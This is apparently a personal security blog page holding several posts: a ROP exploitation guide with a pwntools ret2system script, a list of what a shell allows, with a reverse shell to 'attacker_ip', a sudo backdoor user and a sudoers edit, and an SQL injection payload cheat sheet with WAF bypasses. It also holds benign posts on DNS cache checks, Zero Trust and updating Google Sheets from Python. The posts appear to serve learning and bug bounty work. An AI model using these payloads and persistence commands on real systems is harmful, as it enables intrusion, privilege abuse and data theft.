Wednesday, August 13, 2025

๐Ÿงฐ ROP Exploitation Toolkit: Using checksec, GDB, Pwntools, RopGadget, pwn and More

 Binary exploitation is one of the most fascinating areas in cybersecurity, and Return-Oriented Programming (ROP) is a powerful technique to bypass modern security mechanisms. If you're just getting started or looking to refine your workflow, this post covers the essential tools every ROP exploit developer should know and use.




๐Ÿ” 1. checksec: Know Your Battlefield

Before writing a single byte of shellcode or ROP chain, always run checksec.

This tool reveals critical binary defenses like:

  • NX (No-eXecute) – If enabled, you can't execute shellcode on the stack.

  • PIE (Position-Independent Executable) – Makes addresses random at each run.

  • Canary – Detects stack smashing.

  • RELRO – Hardens the GOT.

๐Ÿง  Pro Tip: If NX is enabled, you can't inject raw shellcode — ROP is your friend.


๐Ÿง  2. GDB: The Exploiter’s Microscope

Use GDB to analyze crashes, inspect memory, and test your payloads.'

Useful GDB commands:

  • run – Start the binary

  • pattern_create / pattern_offset – Find overflow offset (if using pwndbg)

  • x/20x $rsp – Inspect the stack

  • info functions – List available functions (like system)

Use enhanced GDB plugins like:

๐Ÿ” Goal: Determine where your buffer overflow occurs and where to pivot control.


๐Ÿ“ 3. chmod: Set It Executable

If you're working with downloaded or compiled binaries. This ensures you can run or analyze the binary directly.

๐Ÿ” 4. grep: Filter the Noise

When you're hunting for gadgets, functions, or strings, grep helps speed things up. Filter only what matters — like locating /bin/sh or a useful gadget.

๐Ÿงจ 5. RopGadget: Find the Building Blocks

ROP chains are built from gadgets — small instruction sequences ending in ret. Look for essential gadgets:

  • pop rdi; ret → Load the first argument for function calls

  • ret → Useful for stack alignment

  • mov [rdi], rsi; ret → Write memory if needed

๐Ÿง  Tip: Use grep to locate gadgets faster.


๐Ÿ 6. Pwntools (pwn): Automate the Exploit

Python's pwntools makes building and testing exploits efficient. 

๐Ÿ” Automate everything: From calculating offsets to sending payloads and interacting with shells.

๐Ÿงฌ Full ROP Workflow Recap:

StepToolPurpose
1checksec    Inspect binary protections
2gdb + plugins    Debug crashes, find overflow, analyze memory
3grep    Search strings or gadgets
4RopGadget        Discover ROP chain gadgets
5chmod    Make binary executable
6pwntools    Script and test exploit

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
from pwn import *

elf = ELF('./vuln_binary')
rop = ROP(elf)

p = process('./vuln_binary')

pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
binsh = next(elf.search(b'/bin/sh'))
system = elf.symbols['system']

payload = b'A' * 72   # Adjust offset as needed
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)

p.sendline(payload)
p.interactive()

๐Ÿ” Tracking Your PC’s Hidden Connections with ipconfig /displaydns

 Have you ever wondered which websites your PC has visited, or which apps have been silently contacting servers in the background?



Windows actually keeps a short-term DNS cache, and with a simple command, you can see all the domains and IP addresses your system has looked up.

The Magic Command

Open your Command Prompt and run:

ipconfig /displaydns

his command will display your computer’s DNS Resolver Cache — a list of recently resolved domain names along with their corresponding IP addresses.

This cache includes:

  • Websites you visited in your browser.

  • Background requests made by installed apps.

  • Operating system updates and background services.


Why This Matters for Cybersecurity

By looking at this DNS cache, you might:

  • Spot suspicious domains your PC connected to.

  • Identify malware communication attempts to Command-and-Control (C2) servers.

  • Detect apps secretly “phoning home” without your permission.


A Real Example

Here’s what your DNS cache might look like:

IP AddressDomain NameNumber of VisitsNotes
93.184.216.34example.com5Legitimate website
45.155.205.233suspicious-malware-server.io3๐Ÿšจ Possible C2 server
172.217.16.206google.com20Google search traffic

Step 1: Count the Visits

You can export the ipconfig /displaydns output to a file:

ipconfig /displaydns > dns_log.txt

Then, with a simple Python script, you can parse the file, group by IP/domain, and count how many times each appears.


Step 2: Check the Reputation of Each IP

For cybersecurity purposes, check whether any of these IPs have been flagged for malicious activity.
You can use free APIs like:

  • VirusTotal — Scan an IP for malware reports.

  • AbuseIPDB — Check if an IP is involved in spam, hacking, or DDoS.

Step 3: Monitor Live Traffic with Wireshark

While ipconfig /displaydns shows past DNS lookups, Wireshark lets you capture real-time network traffic to see exactly which IPs your PC is contacting at this moment.

By combining:

  • ipconfig /displaydns — recent history

  • Wireshark — live monitoring

  • VirusTotal / AbuseIPDB — reputation checks

…you’ll have a powerful toolkit for spotting malware, spyware, or unwanted tracking.


Pro Tip: If you discover unknown IPs with bad reputations, disconnect from the internet immediately and run a full antivirus scan.


If you want, I can also add a full working Python & PyQt6 tool that automatically runs ipconfig /displaydns, counts visits, checks IP reputation on both VirusTotal and AbuseIPDB, and displays it in a table.


Thursday, August 7, 2025

๐Ÿ” Zero Trust Security Framework: Step-by-Step Guide

 

๐Ÿ”น 1. Define the Scope and Goals

  • Identify what you're protecting: data, applications, infrastructure, users.

  • Set clear objectives (e.g., prevent lateral movement, secure remote access, protect sensitive data).




๐Ÿ”น 2. Map the Environment

  • Inventory all assets: users, devices, applications, data, and network components.

  • Classify data by sensitivity.

  • Understand current user roles, permissions, and network flows.


๐Ÿ”น 3. Verify Explicitly

  • Authenticate and authorize every access request using:

    • MFA (Multi-Factor Authentication)

    • SSO (Single Sign-On)

    • Conditional access policies (location, device state, behavior)


๐Ÿ”น 4. Implement Least Privilege Access

  • Give users and systems only the permissions they need, for only as long as they need.

  • Enforce Just-In-Time (JIT) and Just-Enough Access (JEA).

  • Regularly audit and revoke unnecessary privileges.


๐Ÿ”น 5. Micro-Segment the Network

  • Divide your network into secure zones.

  • Limit communication between them to only what's necessary.

  • Use internal firewalls or SDNs (Software-Defined Networking) to control flows.


๐Ÿ”น 6. Use Strong Device Security

  • Only allow access from managed, compliant, and secure devices.

  • Use EDR (Endpoint Detection and Response) solutions.

  • Enforce patching and anti-malware policies.


๐Ÿ”น 7. Continuous Monitoring & Analytics

  • Monitor logs and network traffic for anomalies.

  • Use SIEM (Security Information and Event Management) and UEBA (User & Entity Behavior Analytics).

  • Set up automated alerts and response playbooks.


๐Ÿ”น 8. Secure Workloads and Data

  • Encrypt data at rest and in transit.

  • Apply DLP (Data Loss Prevention) policies.

  • Ensure containers, VMs, and serverless functions follow least privilege and isolation best practices.


๐Ÿ”น 9. Automate Threat Response

  • Use SOAR (Security Orchestration, Automation, and Response) tools.

  • Respond quickly to threats via playbooks (e.g., isolate a device, block a user, trigger MFA challenge).


๐Ÿ”น 10. Continuous Improvement

  • Perform regular red-teaming, penetration testing, and tabletop exercises.

  • Update your trust policies and access models as systems, users, and threats evolve.


✅ Tools & Technologies Commonly Used

  • Identity: Azure AD, Okta, Auth0

  • Access Control: Zscaler, Palo Alto Prisma, BeyondTrust

  • Monitoring: Splunk, ELK, CrowdStrike, SentinelOne

  • Automation: Palo Alto Cortex XSOAR, Microsoft Sentinel, Tines


๐Ÿ“Œ Final Tips

  • Zero Trust is a journey, not a product or a one-time project.

  • It requires buy-in across IT, security, and business teams.

  • Start small, show value, and expand.

Calling system("/bin/sh") — a common goal in exploitation

 Calling system("/bin/sh") in an exploit gives the attacker a shell — specifically, a new instance of the Bourne shell (sh) — which runs with the same privileges as the exploited program.


๐Ÿ”“ So what can you do with system("/bin/sh")?

That depends on who owns the process you're exploiting:




๐Ÿง‘‍๐Ÿ’ป If it's a normal user process:

You get a shell as that user, allowing you to:

  • Read/write/modify their files.

  • Access credentials (e.g., SSH keys, saved passwords).

  • Modify or hijack scripts they use (for persistence).

  • Dump memory or tokens (e.g., cookies, secrets).

  • Set up backdoors or keyloggers.


๐Ÿ‘‘ If it's a root process:

You get a root shell — this is game over. You can:

  • Access and modify any file on the system.

  • Add new users or escalate other accounts.

  • Install malware, rootkits, or backdoors.

  • Disable logging, hide your tracks.

  • Dump password hashes (/etc/shadow) and crack them.

  • Open reverse shells to maintain access.

  • Disable or modify firewalls or security software.


⚠️ Real-World Example Use Cases

1. ๐Ÿš Interactive Shell

You can interact with the target system just like you're logged in:

1
2
3
ls -la
cd /home/victim/
cat .bash_history

2. ๐ŸŽฃ Create a Reverse Shell (connects back to your machine):

system("bash -i >& /dev/tcp/attacker_ip/4444 0>&1");

I also have posted a tuorial on reverse shell: Reverse Shell with NetCat

3. ๐Ÿ˜ Add a User:

useradd hacker -G sudo

echo "hacker:hackme" | chpasswd

 4. ๐Ÿ—ƒ️ Modify /etc/sudoers:

echo "hacker ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers

๐Ÿงช In CTFs or Security Labs:

Calling system("/bin/sh") is usually the “win condition”, because:

  • It proves you control the instruction pointer (EIP/RIP).

  • It gives you interactive control.

  • You can use it to read the flag, like:

cat /home/ctf/flag.txt

๐Ÿ” How Defenders Block This

Defensive features that block or mitigate this:

  • ASLR (Address Space Layout Randomization)

  • DEP/NX (Non-Executable stack)

  • Stack canaries

  • RELRO / PIE / Fortify

  • seccomp sandboxing (blocks system calls)

  • AppArmor / SELinux


✅ Summary

system("/bin/sh") gives you:
An interactive shellas the target user
Read/write file accessto user-owned files
Escalation pathif misconfigurations exist
Remote accessvia reverse shell
Root-level controlif the binary runs as root

Wednesday, August 6, 2025

Rediscovering My Passion for Exploit Development

 I didn’t have an internet connection for the past two weeks — and honestly, it drove me a little crazy. To ease my boredom, I started digging through old files on my PC looking for something interesting to read.

That’s when I stumbled upon a research paper I had downloaded years ago. The title immediately grabbed my attention:
"Identifying Code Injection and Reuse Payloads in Memory Error Exploits."



Curious, I opened it up and started reading. Although it was packed with highly technical terms and clearly targeted toward C/C++ and assembly language programmers, it still resonated with me. I used to code in C and C++ around 12 years ago, so some of the concepts felt familiar — and exciting.

What really sparked my interest was the realization that this paper dives deep into code injection and reuse attacks, particularly ROP (Return-Oriented Programming) techniques. I had dabbled in code injection before — in fact, I even published a demo program about it here on this blog a couple of years ago. But this paper took things to an entirely new level. I hadn't realized just how deep this rabbit hole goes.

Unfortunately, the paper lacked practical examples — something I really needed to bridge the gap between theory and application. But it gave me a ton of keywords and ideas that I could explore further.

So the moment I got back online this morning, I went straight to ChatGPT and started asking:

  • What is this term?

  • Why is it used?

  • Can you build a sample program for this exploit?

I wanted to understand everything the paper didn't explain in detail — and now I feel like I'm finally connecting the dots. I'm especially excited about how this knowledge can eventually be applied to bug bounty hunting and security research.

This is just the beginning of my journey into ROP attacks, memory exploits, and advanced code reuse techniques. Stay tuned — I’ll be sharing what I learn, along with code samples, demos, and more.

Let’s dive deep into exploitation — one gadget at a time. ๐Ÿง ๐Ÿ’ป๐Ÿ”

๐Ÿ’ฅ SQL Injection Payloads for Bug Bounty Hunting: A Hands-On Guide

 SQL Injection (SQLi) remains one of the most impactful web vulnerabilities — despite being known for over two decades. As a bug bounty hunter, mastering SQLi techniques can earn you serious recognition, bounties, and credibility. But responsible hacking always starts with permission. In this post, we’ll explore practical SQLi payloads you can use only on authorized targets, like those listed on platforms such as HackerOne, Bugcrowd, Synack, and YesWeHack.


๐Ÿšจ Legal Disclaimer

This blog is for educational purposes only. Do not use these techniques on systems you do not have explicit permission to test. Always respect the rules of engagement (RoE) in your bug bounty program.


๐Ÿง  What is SQL Injection?

SQL Injection occurs when an attacker is able to inject arbitrary SQL code into a backend database query. This can lead to unauthorized data access, bypassing authentication, or even full system compromise.


๐Ÿ”Ž Where to Look for SQLi?

SQLi opportunities can be found in:

  • Login forms

  • Search bars

  • Product filters

  • URL parameters

  • HTTP headers (e.g., User-Agent, Referer)

  • Cookies and hidden fields


๐Ÿงช Basic SQLi Payloads

These payloads test for simple injection points.

1
2
3
4
' OR '1'='1
' OR 1=1 --
admin' --
' OR '1'='1' --

Use these on login forms to attempt bypasses. If the app doesn’t sanitize input, you might gain unauthorized access.


๐Ÿงจ Error-Based SQLi

Use these when the server returns SQL-related error messages.

1
2
' AND 1=CAST((SELECT user()) AS INT)--
' AND (SELECT COUNT(*) FROM users) > 0--

Look for verbose error messages like:

You have an error in your SQL syntax...


๐Ÿงฎ UNION-Based SQLi

This technique attempts to merge malicious queries with legitimate ones using UNION SELECT.

1
2
' UNION SELECT null, user() --
' UNION SELECT null, database(), version() --

Use ORDER BY to find the number of columns:

1
2
' ORDER BY 1--
' ORDER BY 2--

๐Ÿ•ต️ Blind SQLi (Boolean-Based)

Ideal when the application behaves differently based on true/false conditions, even without visible errors.

1
2
3
' AND 1=1 --
' AND 1=2 --
' AND SUBSTRING(@@version,1,1)='5' --

Watch for changes in response length or content.


⏳ Time-Based Blind SQLi

Detectable via delayed responses using SLEEP() or WAITFOR DELAY.

1
2
' OR IF(1=1, SLEEP(5), 0)--
'; WAITFOR DELAY '0:0:5'--  -- (SQL Server)

Useful when no output is returned but the response delay reveals logic processing.


๐Ÿ—ƒ️ Targeting Specific Databases

MySQL

1
' UNION SELECT user(), database() --

PostgreSQL
1
' UNION SELECT current_user, version() --

SQL Server
1
' UNION SELECT system_user, @@version --

Oracle
1
' UNION SELECT banner FROM v$version --


๐Ÿงฑ Bypassing WAFs

Use encoding, case changes, or SQL comments:

1
2
3
4
%27%20OR%201=1--
' oR '1'='1
'/*!UNION*/ SELECT NULL,NULL--
%27UnIoN%20SeLeCt%20null,null--

WAFs may block obvious patterns, but these tricks can sneak past.


๐Ÿ› ️ Tools of the Trade

  • sqlmap — Automated SQLi testing tool

  • Burp Suite — With plugins like SQLiPy or Intruder for manual fuzzing

  • NoSQLMap — For MongoDB and other NoSQL targets

  • HackTricks SQLi Cheatsheet — Excellent reference


๐ŸŽฏ Pro Tips for Bounty Hunters

  • ๐Ÿ“‹ Log all payloads: Always keep a record of what you tested and how.

  • ๐Ÿ” Try every input vector: Don’t just test URLs — check headers and cookies too.

  • ๐Ÿ” Understand the app logic: Knowing how queries are structured helps tailor your payloads.

  • ๐Ÿšซ Respect the scope: Always stay within allowed domains/endpoints.


๐Ÿ Final Thoughts

SQL Injection is more than just a classic bug — it’s still a high-value target in bug bounty hunting. Understanding how and where to inject payloads can make the difference between a $0 report and a $5,000+ bounty.

Want to sharpen your skills? Try labs like:

  • PortSwigger Web Security Academy

  • Hack The Box

  • TryHackMe

Happy hunting, and stay ethical!


๐Ÿ”— Follow Me for More

๐Ÿ’ฌ Got a favorite payload or tool? Share it in the comments!

๐Ÿ“ง Subscribe for more bug bounty techniques and real-world examples.

Monday, May 5, 2025

Step-by-Step Guide: How to Update Google Sheets Using Python

 

Step 1: Set up a Google Cloud project

1️⃣ Go to Google Cloud Console.
2️⃣ Create a new project (or select an existing one).
3️⃣ Go to APIs & Services → Library.
4️⃣ Search for Google Sheets APIEnable it.
5️⃣ Search for Google Drive APIEnable it.


Step 2: Create service account credentials

1️⃣ Go to APIs & Services → Credentials.
2️⃣ Click Create Credentials → Service Account.
3️⃣ Name the service account (e.g., my-sheet-updater).
4️⃣ After creating, under the Keys section, click Add Key → Create new key → JSON.
✅ This downloads a .json file — save this securely (you will use it in your Python script).


Step 3: Share your Google Sheet

1️⃣ Open your Google Sheet in your browser.
2️⃣ Click Share (top right).
3️⃣ In the Add people box, paste the client_email from your JSON file (look inside the file for "client_email": "...").
4️⃣ Give it Editor permission.
✅ This lets the script access the sheet.


Step 4: Install Python libraries

Open your terminal or command prompt and install the needed packages:

pip install gspread oauth2client

Step 5: Write the Python script

Here’s a minimal working example:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import gspread
from oauth2client.service_account import ServiceAccountCredentials

# Set the path to your downloaded JSON key file
json_path = 'C:/project/your-service-account-file.json'

# Define the API scopes
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']

# Authenticate using the JSON key
creds = ServiceAccountCredentials.from_json_keyfile_name(json_path, scope)
client = gspread.authorize(creds)

# Open your Google Sheet by name
sheet = client.open('Test_Data').sheet1  # or .worksheet('Sheet1') if multiple tabs

# Read data (for testing)
data = sheet.get_all_records()
print("Current Data:", data)

# Example: Update cell B2
sheet.update('B2', 'Updated by Python!')

# Example: Update a row (second row, full values)
sheet.update('2', ['Company Name', 'LinkedIn URL', 'Website', 'Name', 'Title', 'Email', 'Address', 'Suite', 'City', 'State', 'Zip'])

print("Update complete!")

Step 6: Run the script

Just run:

python your_script.py

 ✅ If it connects correctly, it will update your Google Sheet.

Common issues & fixes

  • 403 error / no access → Make sure you shared the sheet with the service account email.

  • Spreadsheet not found → Check that the sheet name in the code exactly matches (including capitalization).

  • JSON file issues → Ensure you’re using the service account credentials, not OAuth or other types.